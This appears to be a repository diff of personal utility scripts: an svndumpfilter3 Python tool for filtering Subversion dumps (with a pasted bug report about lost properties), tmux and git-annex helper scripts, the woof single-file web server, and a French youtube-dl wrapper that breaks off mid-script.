Hello Martin,
First of all, your tool helped me a lot in my task. But I think I have
found a critical bug in svndumpfilter3 which can cause loss of
revisioned properties. Please check it and distribute a fix if you have
time.
I experienced that some files and folders lost their revisioned
properties after filtering them by svndumpfilter3. It was not some of
the properties, but all of them, and I have not found any pattern at
first. By comparing the input and output dumps I realized, that the
problem occures with files/folders which has modifications committed.
The root cause is that if a modification does not tough the properties,
the lump of that change will not contain properties section at all, but
svndumpfilter3 will add an empty one anyway. But this empty properties
section means, that properties has been modified, and after modification
there are no porperties anymore.
I propose something like this: during read of lump check if there were
properties section read at all, and use this info to decide if it should
be written.
"""
## FIXME: TODO, incorporate change from Barry Warsaw:
##
## I did make one small change though. InterestingPaths.interesting()
## seems more useful to me just doing a straight up regexp match instead
## of trying to split the path and matching against the first
## component. I'm not quite sure how useful the default behavior would
## be actually. So I made a change to something like this:
##
## for r in self.res:
## if r.match(path):
## r = True
## break
## else:
## r = False
## ...
##
## So I could do something like
##
## ... | svndumpfilter3 --exclude /staging/.* > ...
##
## or more complicated regexps. Anyway, again thanks and hope all is well.
##
## --Barry
##
## A note about locale From Doug Hunley
## ------------------------------------
##
## I've been seeing the issue w/ svndumpfilter3 where the dump that is
## created contains all the relevant revisions but no actual data. In my
## case, it turns out that doing:
## export LC_CTYPE=en_US.UTF-8
## and /then/ running svndumpfilter3 worked.
##
## When I tried to to checkout a copy of the repo I was using to
## 'untangle' things I found that the checkout failed with an error about
## being unable to convert string to native encoding, which when googled,
## led me to a page saying to set the above. Doing so let me check out
## the repo in question, so I then re-ran svndumpfilter and got a useable
## dmp file.
##
## --Doug
__author__ = 'Martin Blais <blais@furius.ca>'
__author_orig__ = 'Simon Tatham (svndumpfilter2)'
__contributors__ = ('Martin Blais <blais@furius.ca>',
'Matthias Troffaes <matthias.troffaes@gmail.com>',)
import sys
if sys.version_info[:2] < (2, 4):
raise SystemExit("Error: You need Python 2.4 or over.")
# stdlib imports
import os, re, string, md5, warnings
from os.path import basename
from subprocess import Popen, PIPE
# Constants for versions.
# Note: v3 does not really exist, see this for details:
# http://svn.haxx.se/dev/archive-2004-11/1111.shtml
__supported_versions__ = ('2', '3')
fmtequiv = {'1': 1,
'2': 2,
'3': 2}
format_warning = False
# Note
# ----
# We expect to be reading a valid SVN dump file output by SVN
# itself, so I currently feel no particular obligation to do
# user-friendly error reporting. Assertion failures or Python
# exceptions are perfectly adequate, since errors should only show
# up during development of this script.
# The sensible way to deal with a pathname is to split it into pieces at the
# slashes and thereafter treat it as a list. The following functions provide
# that functionality.
# Note: from Simon Tatham.
def splitpath(s):
"""
Split a string path into a path-as-list (a list of its components).
"""
thelist = string.split(s, "/")
# Simplest way to remove all empty elements!
try:
while 1:
thelist.remove("")
except ValueError:
pass
return thelist
def joinpath(thelist, prefix=""):
"""
Convert a path-as-list into a string.
"""
return prefix + string.join(thelist, "/")
def catpath(path1, path2, prefix=""):
"""
Concatenate two paths, return a path as a string.
"""
return joinpath(splitpath(path1) + splitpath(path2), prefix)
# Note: from Simon Tatham.
class InterestingPaths:
"""
Decide whether a pathname is interesting or not.
"""
def __init__(self, args, reverse):
self.reverse = reverse
"""True if we should reverse the matches, e.g. true means exclude on the
list of paths rather than include."""
self.res = []
for a in args:
self.res.append([])
for component in splitpath(a):
self.res[-1].append(re.compile(component))
"""List of regular expressions to match against/exclude."""
def interesting(self, path):
"""
Return true if this path is considered included.
"""
match = False
acomps = splitpath(path)
assert len(acomps) > 0
for rcomps in self.res:
# if rcomps has more components than acomps
# then we cannot have a match, so skip this case
if len(rcomps) > len(acomps):
continue
# see if rcomps matches acomps
for r, a in zip(rcomps, acomps):
if not r.match(a):
break
else:
# everything matches
match = True
break
if self.reverse:
match = not match
return match
# Note: from Simon Tatham.
class Lump:
"""
A class and some functions to handle a single lump of
RFC822-ish-headers-plus-data read from an SVN dump file.
"""
def __init__(self):
self.hdrlist = []
self.hdrdict = {}
self.prop = ""
self.text = ""
self.proplist = []
self.propdict = {}
def sethdr(self, key, val):
"""
Set header 'key' to 'val'.
"""
if not self.hdrdict.has_key(key):
self.hdrlist.append(key)
self.hdrdict[key] = val
def delhdr(self, key):
"""
Delete the header 'key'.
"""
if self.hdrdict.has_key(key):
del self.hdrdict[key]
self.hdrlist.remove(key)
def propparse(self):
"""
Parse the properties of the lump.
"""
index = 0
while 1:
if self.prop[index:index+2] == "K ":
wantval = 1
elif self.prop[index:index+2] == "D ":
wantval = 0
elif self.prop[index:index+9] == "PROPS-END":
break
else:
raise "Unrecognised record in props section"
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
namelen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+namelen] == "\n"
name = self.prop[nlpos+1:nlpos+1+namelen]
index = nlpos+2+namelen
if wantval:
assert self.prop[index:index+2] == "V "
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
proplen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+proplen] == "\n"
prop = self.prop[nlpos+1:nlpos+1+proplen]
index = nlpos+2+proplen
else:
prop = None
self.proplist.append(name)
self.propdict[name] = prop
def setprop(self, key, val):
"""
Set property 'key' to 'val'.
"""
if not self.propdict.has_key(key):
self.proplist.append(key)
self.propdict[key] = val
def delprop(self, key):
"""
Delete property 'key'.
"""
if self.propdict.has_key(key):
del self.propdict[key]
self.proplist.remove(key)
def correct_headers(self):
"""
Adjust the headers, from updated contents.
"""
# First reconstitute the properties block.
self.prop = ""
# JT if there's a delete of something that got added in the same transaction
# (ie, it was added and then renamed), there must be no properties created for it
#if not opts.prune_properties or len(self.proplist) > 0:
if (not opts.prune_properties or len(self.proplist) > 0) and self.hdrdict.get('Node-action') != "delete":
for key in self.proplist:
val = self.propdict[key]
if val is None:
self.prop += "D %d\n%s\n" % (len(key), key)
else:
self.prop += "K %d\n%s\n" % (len(key), key)
self.prop += "V %d\n%s\n" % (len(val), val)
self.prop = self.prop + "PROPS-END\n"
# Now fix up the content length headers.
if len(self.prop) > 0:
self.sethdr("Prop-content-length", str(len(self.prop)))
else:
self.delhdr("Prop-content-length")
if len(self.text) > 0 or \
(self.hdrdict.get('Node-action', None) == 'add' and
self.hdrdict.get('Node-kind', None) == 'file' and
not self.hdrdict.get('Node-copyfrom-path', None)):
self.sethdr("Text-content-length", str(len(self.text)))
m = md5.new()
m.update(self.text)
self.sethdr("Text-content-md5", m.hexdigest())
else:
self.delhdr("Text-content-length")
self.delhdr("Text-content-md5")
if len(self.prop) > 0 or len(self.text) > 0:
self.sethdr("Content-length", str(len(self.prop)+len(self.text)))
else:
self.delhdr("Content-length")
format_re = re.compile('SVN-fs-dump-format-version: (\d+)\s*$')
uuid_re = re.compile('UUID: ([0-9a-f\-]+)\s*$')
def read_dump_header(f):
"""
Match and read a dumpfile's header and return the format versin and file's
UUID.
"""
mo_version = format_re.match(f.readline())
assert mo_version
f.readline()
mo_uuid = uuid_re.match(f.readline())
assert mo_uuid
f.readline()
text = '%s\n%s\n' % (mo_version.string, mo_uuid.string)
return mo_version.group(1), mo_uuid.group(1), text
header_re = re.compile('([a-zA-Z0-9\-]+): (.*)$')
# Note: from Simon Tatham.
def read_rfc822_headers(f):
"""
Read a set of RFC822 headers from the given file. We return a dict and the
set of original lines that were parsed to obtain the contents.
"""
ret = Lump()
lines = []
while 1:
s = f.readline()
if not s:
return None, [] # end of file
# Watch for the newline char that ends the headers.
if s == '\n':
if len(ret.hdrlist) > 0:
break # newline after headers ends them
else:
continue # newline before headers is simply ignored
lines.append(s)
mo = header_re.match(s)
if mo is None:
raise SystemExit("Error: Parsing header: %s" % s)
ret.sethdr(*mo.groups())
return ret, lines
# Note: from Simon Tatham.
def read_lump(f):
"""
Read a single lump from the given file.
Note: there is a single empty line that is used to conclude the RFC headers,
and it is not part of the rest. Then you have the properties, which are of
exactly the property length, and right away follows the contents of exactly
the length of the content length. Then follows two newline characters and
then the next lump starts.
"""
lump, lines = read_rfc822_headers(f)
if lump is None:
return None
pcl = int(lump.hdrdict.get("Prop-content-length", "0"))
tcl = int(lump.hdrdict.get("Text-content-length", "0"))
if pcl > 0:
lump.prop = f.read(pcl)
lump.propparse()
if tcl > 0:
lump.text = f.read(tcl)
lump.orig_text = os.linesep.join(lines) + lump.prop + lump.text
return lump
def write_lump(f, lump):
"""
Write a single lump to the given file.
"""
# Make sure that the lengths are adjusted appropriately.
lump.correct_headers()
for key in lump.hdrlist:
val = lump.hdrdict[key]
f.write(key + ": " + val + "\n")
f.write("\n")
# Render the payload.
f.write(lump.prop)
f.write(lump.text)
# Add newlines at the end of chunks, for readers.
f.write('\n')
if not lump.hdrdict.has_key("Revision-number"):
f.write('\n')
def fetch_rev_rename(repos, srcrev, srcpath, path, fout, flog, format):
"""
Dumps 'srcpath' at revision 'srcrev' from repository 'repos',
renaming the root of all the paths in it to 'path', and
outputting the lumps in 'fout' (without the header and revision
lump).
"""
assert isinstance(srcrev, int)
# Must find the source node, as it existed in the given revision, and copy
# it in full.
cmd = ('svnadmin', 'dump', '-r', str(srcrev),
opts.repos, srcpath)
cmd_filter = ('svndumpfilter', 'include', srcpath)
if opts.debug:
print >> flog, ("Running command: '%s | %s'" %
(' '.join(cmd), ' '.join(cmd_filter)))
fnull = open('/dev/null', 'w')
p1 = Popen(cmd, stdout=PIPE, stderr=fnull)
p2 = Popen(cmd_filter, stdin=p1.stdout,
stdout=PIPE, stderr=fnull)
fs = p2.stdout
#
# Process the subdump.
#
# Read and drop dump header.
format_sub, uuid_sub, text_sub = read_dump_header(fs)
global format_warning
if fmtequiv[format] != fmtequiv[format_sub] and not format_warning:
warnings.warn("Warning: Dump format is different than "
"the version of Subversion used to convert "
"move/copy into adds.")
format_warning = True
# Read and drpo the revision.
lump_sub = read_lump(fs)
assert lump_sub is not None
assert lump_sub.hdrdict.has_key('Revision-number')
while 1:
# Read one lump at a time
lump_sub = read_lump(fs)
if lump_sub is None:
break # At EOF
# Make sure all the rest are file/dir lumps.
assert not lump_sub.hdrdict.has_key('Revision-number')
# Translate filename to its new location.
path_sub = lump_sub.hdrdict['Node-path']
assert path_sub.startswith(srcpath)
path_sub_new = path + path_sub[len(srcpath):]
lump_sub.sethdr('Node-path', path_sub_new)
print >> flog, ("%s: Converted '%s' to '%s'" %
(progname, path_sub, path_sub_new))
if path_sub_new == path:
print >> flog, ("%s: Marked '%s' as untangled." %
(progname, path))
lines = ("Node-copyfrom-path: %s" % srcpath,
"Node-copyfrom-rev: %d" % srcrev)
lump_sub.setprop('svn:untangled', os.linesep.join(lines))
write_lump(fout, lump_sub)
p2.wait()
if p2.returncode != 0:
raise SystemExit("Error: Running %s" % cmd)
def parse_options():
"""
Parse and validate the options.
"""
global progname
progname = basename(sys.argv[0])
import optparse
parser = optparse.OptionParser(__doc__.strip())
# Original svndumpfilter options.
#
# FIXME: we still need to implement these 3 options.
#
# FIXME: we could convert this script to use subcommands and add the same
# subcommand options that are present in svndumpfilter.
parser.add_option('--drop-empty-revs', action='store_true',
help="Remove revisions emptied by filtering.")
parser.add_option('--renumber-revs', action='store_true',
help="Renumber revisions left after filtering.")
parser.add_option('--preserve-revprops', action='store_true',
help="Don't filter revision properties.")
parser.add_option('--quiet', action='store_true',
help="Do not display filtering statistics.")
parser.add_option('-e', '--exclude', action='store_true',
help="The given paths are to be excluded rather than "
"included (the default is to include).")
parser.add_option('-p', '--prune-properties', action='store_true',
help="Prune empty properties if empty. This makes the "
"dump file smaller, but does not match latest "
"version of svnadmin dump, so don't use if e.g. "
"you want to diff the input and output dump.")
parser.add_option('-u', '--untangle', action='store', dest='repos',
metavar='REPOS_PATH',
help="If True, convert move/copy from filtered paths "
"to additions. You need to specify the repository to "
"fetch the missing files from.")
parser.add_option('-n', '--no-filter', action='store_true',
help="Do not actually apply filters, but just "
"perform the requested conversions. This can be used "
"as a test by running the output into svndumpfilter, "
"which should now succeed.")
parser.add_option('-k', '--ignore-missing', action='store_true',
help="Continue as much as possible after an error due to "
"a missing file. If such errors are present, the "
"resulting noutput dump may not be usable (files will be "
"missing. The original svndumpfilter actually exits "
"when this occurs (this is our default behaviour as "
"well). You can use this to view the list of files "
"that are missing by using the specified filter.")
parser.add_option("--filter-contents", type="string", nargs=3, default=[],
action="append", metavar="RX_FILES RX_MATCH SUB",
help="Apply a regular expression substitution (filter) "
"to the contents of a certain set of files. This "
"option needs three arguments (separated by "
"spaces): a regular expression that specifies the "
"files to be processed (eg: \"*.[ch]\"); the regexp "
"that matches the text; the replacement regexp. You "
"can specify this option as many times as you need.")
parser.add_option("--filter-logs", type="string", nargs=2, default=[],
action="append", metavar="RX_MATCH SUB",
help="Apply a regular expression substitution (filter) "
"to the commit log messages. This "
"option needs two arguments (separated by "
"spaces): the regexp "
"that matches the text; the replacement regexp. You "
"can specify this option as many times as you need.")
parser.add_option("--skip-rev", type="int", action="append", default=[],
metavar="REV",
help="Skip (filter out) a specific revision. You can "
"specify this option as many times as you need.")
parser.add_option('--debug', action='store_true',
help=optparse.SUPPRESS_HELP)
global opts
opts, args = parser.parse_args()
# Args can be empty. In that case, we will not do any path-based filtering
# (= all paths are included).
inpaths = args
# Validate filter regular expressions
try:
opts.filter_contents = [(re.compile(a), re.compile(b), c)
for a,b,c in opts.filter_contents]
opts.filter_logs = [(re.compile(a), b)
for a,b in opts.filter_logs]
except Exception, e:
parser.error("error parsing regular expression: %s" % str(e))
if opts.no_filter and not opts.repos:
parser.error("Both filtering and untangle are disabled. "
"This filter will have no effect.")
if opts.repos and opts.ignore_missing:
parser.error("You don't need --ignore-missing if you're untangling.")
opts.skip_rev = set(opts.skip_rev)
for optname in 'drop-empty-revs', 'renumber-revs', 'preserve-revprops':
if getattr(opts, optname.replace('-', '_')):
parser.error("(Option '%s' not implemented)." % optname)
return opts, inpaths
def main():
"""
Main program that just reads the lumps and copies them out.
"""
opts, inpaths = parse_options()
# Open in and out files.
fr = sys.stdin
fw = sys.stdout
flog = sys.stderr
# Track which base files are interesting, accepting regexps for input
# filenames.
if opts.exclude:
print >> flog, 'Excluding prefixes:'
else:
print >> flog, 'Including prefixes:'
for p in inpaths:
print >> flog, " '/%s'" % p
print >> flog
if not inpaths:
opts.exclude = True
paths = InterestingPaths(inpaths, opts.exclude)
# Read the dumpfile header.
format, uuid, text = read_dump_header(fr)
fw.write(text)
if format not in __supported_versions__:
# Note: you could update this script easily to support other formats, it
# will probably be trivial to do so.
raise SystemExit("Error: dump file in format '%s' not supported." %
format)
filtered = set()
"""Set of filtered paths."""
converted = []
"""List of (srcpath, destpath, type, rev) tuples that describe the paths
that were converted from move/copy into additions."""
skipping = False
"""True while we are skipping a revision."""
# Process the dump file.
while 1:
# Read one lump at a time
lump = read_lump(fr)
if lump is None:
break # At EOF
# Let the revisions pass through
if lump.hdrdict.has_key('Revision-number'):
revno = lump.hdrdict['Revision-number']
if int(revno) in opts.skip_rev:
print >> flog, 'Revision %s filtered out.' % revno
skipping = True
continue
skipping = False
# Filter svn:log property
# JT Revision 0 may not have an svn:log entry, so we need do accommodate that
# (added if condition)
if lump.hdrdict.has_key('svn:log'):
log = lump.propdict["svn:log"]
num_subs = 0
for rx_search, sub in opts.filter_logs:
lump.propdict["svn:log"], subs = re.subn(rx_search, sub, lump.propdict["svn:log"])
num_subs += subs
if num_subs:
print >> flog, "log filtered: %d times" % num_subs
lump.correct_headers()
write_lump(fw, lump)
if not opts.quiet:
print >> flog, 'Revision %s committed as %s.' % (revno, revno)
continue
# If we're skipping this revision, go to the next lump
if skipping:
continue
# Print some kind of progress information.
if opts.debug:
d = lump.hdrdict
print >> flog, (
' %-10s %-10s %s' %
(d.get('Node-kind', ''), d['Node-action'], d['Node-path']))
# Filter out the uninteresting lumps
path = lump.hdrdict['Node-path']
if not paths.interesting(path):
filtered.add(path)
continue
# See if any of the provided filters match against this file
num_subs = 0
for rx_file, rx_search, sub in opts.filter_contents:
if rx_file.search(path):
lump.text, subs = re.subn(rx_search, sub, lump.text)
num_subs += subs
if num_subs:
print >> flog, "contents filtered: %d times" % num_subs
lump.correct_headers()
# If this is not a move/copy.
if not lump.hdrdict.has_key("Node-copyfrom-path"):
# Just pass through.
write_lump(fw, lump)
else:
# This is a move/copy.
srcrev = int(lump.hdrdict["Node-copyfrom-rev"])
srcpath = lump.hdrdict["Node-copyfrom-path"]
# Check if the copy's source comes from a filtered path.
if paths.interesting(srcpath):
# If it comes from an included path, just pass through.
write_lump(fw, lump)
else:
# Otherwise we deal with the case where the source comes from a
# filtered path.
if not opts.repos:
msg = ("%s: Invalid copy source path '%s'" %
(progname, srcpath))
if opts.ignore_missing:
print >> flog, msg
continue
else:
raise SystemExit(msg)
converted.append(
(srcpath, path, lump.hdrdict['Node-kind'], srcrev))
print >> flog, ("%s: Converting '%s' to a copy on '%s'" %
(progname, srcpath, path))
# Fetch the old revision from the repository.
fetch_rev_rename(opts.repos, srcrev, srcpath, path,
fw, flog, format)
# We also check if the original lump includes a payload, and if
# it does, we need to add a change record providing the new
# contents.
if len(lump.text) > 0 and paths.interesting(path):
assert False ## FIXME: remove
print >> flog, ("%s: Added a change record for '%s' as "
"well.") % (progname, path)
lump.sethdr("Node-action", "change")
lump.delhdr("Node-copyfrom-rev")
lump.delhdr("Node-copyfrom-path")
write_lump(fw, lump)
fr.close()
fw.close()
if not opts.quiet:
# Print summary of dropped nodes.
print >> flog, 'Dropped %d node(s):' % len(filtered)
for path in sorted(filtered):
print >> flog, " '/%s'" % path
print >> flog
# Print summary of converted nodes.
print >> flog, '%s nodes converted into additions(s).' % len(converted)
for srcpath, dstpath, typ, srcrev in sorted(converted):
print >> flog, (" '/%s' to '/%s' (%s, revision %s)" %
(srcpath, dstpath, typ, srcrev))
print >> flog
if __name__ == '__main__':
main()

5
tmux_rattach.sh Executable file
View File

@ -0,0 +1,5 @@
#!/bin/sh
# Crée ou attache une session tmux
export TERM="xterm-256color"
tmux attach || tmux new

11
watch_annex.sh Executable file
View File

@ -0,0 +1,11 @@
#!/bin/sh
# local git-annex directories
#ANNEXES="$HOME/documents $HOME/e-books $HOME/images $HOME/videos"
for annex in $ANNEXES; do
cd $annex
if [ $? -eq 0 ]; then
git annex watch
fi
done

429
woof Executable file
View File

@ -0,0 +1,429 @@
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# woof -- an ad-hoc single file webserver
# Copyright (C) 2004-2009 Simon Budig <simon@budig.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of the GNU General Public License is available at
# http://www.fsf.org/licenses/gpl.txt, you can also write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
# Darwin support with the help from Mat Caughron, <mat@phpconsulting.com>
# Solaris support by Colin Marquardt, <colin.marquardt@zmd.de>
# FreeBSD support with the help from Andy Gimblett, <A.M.Gimblett@swansea.ac.uk>
# Cygwin support by Stefan Reichör <stefan@xsteve.at>
# tarfile usage suggested by Morgan Lefieux <comete@geekandfree.org>
import sys, os, socket, getopt, commands
import urllib, BaseHTTPServer
import ConfigParser
import shutil, tarfile, zipfile
import struct
maxdownloads = 1
TM = object
cpid = -1
compressed = 'gz'
class EvilZipStreamWrapper(TM):
def __init__ (self, victim):
self.victim_fd = victim
self.position = 0
self.tells = []
self.in_file_data = 0
def tell (self):
self.tells.append (self.position)
return self.position
def seek (self, offset, whence = 0):
if offset != 0:
if offset == self.tells[0] + 14:
# the zipfile module tries to fix up the file header.
# write Data descriptor header instead,
# the next write from zipfile
# is CRC, compressed_size and file_size (as required)
self.write ("PK\007\010")
elif offset == self.tells[1]:
# the zipfile module goes to the end of the file. The next
# data written definitely is infrastructure (in_file_data = 0)
self.tells = []
self.in_file_data = 0
else:
raise "unexpected seek for EvilZipStreamWrapper"
def write (self, data):
# only test for headers if we know that we're not writing
# (potentially compressed) data.
if self.in_file_data == 0:
if data[:4] == zipfile.stringFileHeader:
# fix the file header for extra Data descriptor
hdr = list (struct.unpack (zipfile.structFileHeader, data[:30]))
hdr[3] |= (1 << 3)
data = struct.pack (zipfile.structFileHeader, *hdr) + data[30:]
self.in_file_data = 1
elif data[:4] == zipfile.stringCentralDir:
# fix the directory entry to match file header.
hdr = list (struct.unpack (zipfile.structCentralDir, data[:46]))
hdr[5] |= (1 << 3)
data = struct.pack (zipfile.structCentralDir, *hdr) + data[46:]
self.position += len (data)
self.victim_fd.write (data)
def __getattr__ (self, name):
return getattr (self.victim_fd, name)
# Utility function to guess the IP (as a string) where the server can be
# reached from the outside. Quite nasty problem actually.
def find_ip ():
if sys.platform == "cygwin":
ipcfg = os.popen("ipconfig").readlines()
for l in ipcfg:
try:
candidat = l.split(":")[1].strip()
if candidat[0].isdigit():
break
except:
pass
return candidat
os.environ["PATH"] = "/sbin:/usr/sbin:/usr/local/sbin:" + os.environ["PATH"]
platform = os.uname()[0];
if platform == "Linux":
netstat = commands.getoutput ("LC_MESSAGES=C netstat -rn")
defiface = [i.split ()[-1] for i in netstat.split ('\n')
if i.split ()[0] == "0.0.0.0"]
elif platform in ("Darwin", "FreeBSD", "NetBSD"):
netstat = commands.getoutput ("LC_MESSAGES=C netstat -rn")
defiface = [i.split ()[-1] for i in netstat.split ('\n')
if len(i) > 2 and i.split ()[0] == "default"]
elif platform == "SunOS":
netstat = commands.getoutput ("LC_MESSAGES=C netstat -arn")
defiface = [i.split ()[-1] for i in netstat.split ('\n')
if len(i) > 2 and i.split ()[0] == "0.0.0.0"]
else:
print >>sys.stderr, "Unsupported platform; please add support for your platform in find_ip().";
return None
if not defiface:
return None
if platform == "Linux":
ifcfg = commands.getoutput ("LC_MESSAGES=C ifconfig "
+ defiface[0]).split ("inet addr:")
elif platform in ("Darwin", "FreeBSD", "SunOS", "NetBSD"):
ifcfg = commands.getoutput ("LC_MESSAGES=C ifconfig "
+ defiface[0]).split ("inet ")
if len (ifcfg) != 2:
return None
ip_addr = ifcfg[1].split ()[0]
# sanity check
try:
ints = [ i for i in ip_addr.split (".") if 0 <= int(i) <= 255]
if len (ints) != 4:
return None
except ValueError:
return None
return ip_addr
# Main class implementing an HTTP-Requesthandler, that serves just a single
# file and redirects all other requests to this file (this passes the actual
# filename to the client).
# Currently it is impossible to serve different files with different
# instances of this class.
class FileServHTTPRequestHandler (BaseHTTPServer.BaseHTTPRequestHandler):
server_version = "Simons FileServer"
protocol_version = "HTTP/1.0"
filename = "."
def log_request (self, code='-', size='-'):
if code == 200:
BaseHTTPServer.BaseHTTPRequestHandler.log_request (self, code, size)
def do_GET (self):
global maxdownloads, cpid, compressed
# Redirect any request to the filename of the file to serve.
# This hands over the filename to the client.
self.path = urllib.quote (urllib.unquote (self.path))
location = "/" + urllib.quote (os.path.basename (self.filename))
if os.path.isdir (self.filename):
if compressed == 'gz':
location += ".tar.gz"
elif compressed == 'bz2':
location += ".tar.bz2"
elif compressed == 'zip':
location += ".zip"
else:
location += ".tar"
if self.path != location:
txt = """\
<html>
<head><title>302 Found</title></head>
<body>302 Found <a href="%s">here</a>.</body>
</html>\n""" % location
self.send_response (302)
self.send_header ("Location", location)
self.send_header ("Content-type", "text/html")
self.send_header ("Content-Length", str (len (txt)))
self.end_headers ()
self.wfile.write (txt)
return
maxdownloads -= 1
# let a separate process handle the actual download, so that
# multiple downloads can happen simultaneously.
cpid = os.fork ()
if cpid == 0:
# Child process
child = None
type = None
if os.path.isfile (self.filename):
type = "file"
elif os.path.isdir (self.filename):
type = "dir"
if not type:
print >> sys.stderr, "can only serve files or directories. Aborting."
sys.exit (1)
self.send_response (200)
self.send_header ("Content-type", "application/octet-stream")
if os.path.isfile (self.filename):
self.send_header ("Content-Length",
os.path.getsize (self.filename))
self.end_headers ()
try:
if type == "file":
datafile = file (self.filename)
shutil.copyfileobj (datafile, self.wfile)
datafile.close ()
elif type == "dir":
if compressed == 'zip':
ezfile = EvilZipStreamWrapper (self.wfile)
zfile = zipfile.ZipFile (ezfile, 'w', zipfile.ZIP_DEFLATED)
stripoff = os.path.dirname (self.filename) + os.sep
for root, dirs, files in os.walk (self.filename):
for f in files:
filename = os.path.join (root, f)
if filename[:len (stripoff)] != stripoff:
raise RuntimeException, "invalid filename assumptions, please report!"
zfile.write (filename, filename[len (stripoff):])
zfile.close ()
else:
tfile = tarfile.open (mode=('w|' + compressed),
fileobj=self.wfile)
tfile.add (self.filename,
arcname=os.path.basename(self.filename))
tfile.close ()
except Exception, e:
print e
print >>sys.stderr, "Connection broke. Aborting"
def serve_files (filename, maxdown = 1, ip_addr = '', port = 8080):
global maxdownloads
maxdownloads = maxdown
# We have to somehow push the filename of the file to serve to the
# class handling the requests. This is an evil way to do this...
FileServHTTPRequestHandler.filename = filename
try:
httpd = BaseHTTPServer.HTTPServer ((ip_addr, port),
FileServHTTPRequestHandler)
except socket.error:
print >>sys.stderr, "cannot bind to IP address '%s' port %d" % (ip_addr, port)
sys.exit (1)
if not ip_addr:
ip_addr = find_ip ()
if ip_addr:
print "Now serving on http://%s:%s/" % (ip_addr, httpd.server_port)
while cpid != 0 and maxdownloads > 0:
httpd.handle_request ()
def usage (defport, defmaxdown, errmsg = None):
name = os.path.basename (sys.argv[0])
print >>sys.stderr, """
Usage: %s [-i <ip_addr>] [-p <port>] [-c <count>] <file>
%s [-i <ip_addr>] [-p <port>] [-c <count>] [-z|-j|-Z|-u] <dir>
%s [-i <ip_addr>] [-p <port>] [-c <count>] -s
Serves a single file <count> times via http on port <port> on IP
address <ip_addr>.
When a directory is specified, an tar archive gets served. By default
it is gzip compressed. You can specify -z for gzip compression,
-j for bzip2 compression, -Z for ZIP compression or -u for no compression.
You can configure your default compression method in the configuration
file described below.
When -s is specified instead of a filename, %s distributes itself.
defaults: count = %d, port = %d
You can specify different defaults in two locations: /etc/woofrc
and ~/.woofrc can be INI-style config files containing the default
port and the default count. The file in the home directory takes
precedence. The compression methods are "off", "gz", "bz2" or "zip".
Sample file:
[main]
port = 8008
count = 2
ip = 127.0.0.1
compressed = gz
""" % (name, name, name, name, defmaxdown, defport)
if errmsg:
print >>sys.stderr, errmsg
print >>sys.stderr
sys.exit (1)
def main ():
global cpid, compressed
maxdown = 1
port = 8080
ip_addr = ''
config = ConfigParser.ConfigParser()
config.read (['/etc/woofrc', os.path.expanduser('~/.woofrc')])
if config.has_option ('main', 'port'):
port = config.getint ('main', 'port')
if config.has_option ('main', 'count'):
maxdown = config.getint ('main', 'count')
if config.has_option ('main', 'ip'):
ip_addr = config.get ('main', 'ip')
if config.has_option ('main', 'compressed'):
formats = { 'gz' : 'gz',
'true' : 'gz',
'bz' : 'bz2',
'bz2' : 'bz2',
'zip' : 'zip',
'off' : '',
'false' : '' }
compressed = config.get ('main', 'compressed')
compressed = formats.get (compressed, 'gz')
defaultport = port
defaultmaxdown = maxdown
try:
options, filenames = getopt.getopt (sys.argv[1:], "hszjZui:c:p:")
except getopt.GetoptError, desc:
usage (defaultport, defaultmaxdown, desc)
for option, val in options:
if option == '-c':
try:
maxdown = int (val)
if maxdown <= 0:
raise ValueError
except ValueError:
usage (defaultport, defaultmaxdown,
"invalid download count: %r. "
"Please specify an integer >= 0." % val)
elif option == '-i':
ip_addr = val
elif option == '-p':
try:
port = int (val)
except ValueError:
usage (defaultport, defaultmaxdown,
"invalid port number: %r. Please specify an integer" % val)
elif option == '-s':
filenames.append (__file__)
elif option == '-h':
usage (defaultport, defaultmaxdown)
elif option == '-z':
compressed = 'gz'
elif option == '-j':
compressed = 'bz2'
elif option == '-Z':
compressed = 'zip'
elif option == '-u':
compressed = ''
else:
usage (defaultport, defaultmaxdown, "Unknown option: %r" % option)
if len (filenames) == 1:
filename = os.path.abspath (filenames[0])
else:
usage (defaultport, defaultmaxdown,
"Can only serve single files/directories.")
if not os.path.exists (filename):
usage (defaultport, defaultmaxdown,
"%s: No such file or directory" % filenames[0])
if not (os.path.isfile (filename) or os.path.isdir (filename)):
usage (defaultport, defaultmaxdown,
"%s: Neither file nor directory" % filenames[0])
serve_files (filename, maxdown, ip_addr, port)
# wait for child processes to terminate
if cpid != 0:
try:
while 1:
os.wait ()
except OSError:
pass
if __name__=='__main__':
try:
main ()
except KeyboardInterrupt:
pass

45
youtube.sh Executable file
View File

@ -0,0 +1,45 @@
#!/bin/bash
# Script de simplification de DL youtube
# commande zenity
ZENITY="/usr/bin/zenity --title YouTube "
# répertoire cible
DL_DIR="$HOME/Téléchargements/youtube"
# commande download
YOUTUBE_DL_CMD="/usr/bin/youtube-dl -o \"$DL_DIR/%(stitle)s.%(ext)s\" --prefer-free-formats "
# Creation répertoire sible si nécessaire
mkdir -p $DL_DIR
if [ ! $? -eq 0 ] ; then
echo "Impossible de créer $DL_DIR" >&2
DL_DIR=$HOME
fi
# boite dialogue demande URL
VIDEO_URL=$($ZENITY --entry --text "Adresse de la vidéo" --width=600)
echo $VIDEO_URL
if [ -z $VIDEO_URL ] ; then
# pas d'URL
$ZENITY --error --text "Aucune vidéo à télécharger"
else
# nom du fichier créé
FILENAME=$($YOUTUBE_DL_CMD --get-filename "$VIDEO_URL")
if [ $? -eq 0 ] ; then
$ZENITY --info --text "Téléchargement en cours" &
else
$ZENITY --error --text "Erreur de téléchargement"
exit 1
fi
echo "$YOUTUBE_DL_CMD \"$VIDEO_URL\""
$YOUTUBE_DL_CMD "$VIDEO_URL"
#youtube-dl -o "$DL_DIR/%(stitle)s.%(ext)s" --prefer-free-formats "$VIDEO_URL"
if [ $? -eq 0 ] ; then
echo "Ouverture: $FILENAME"
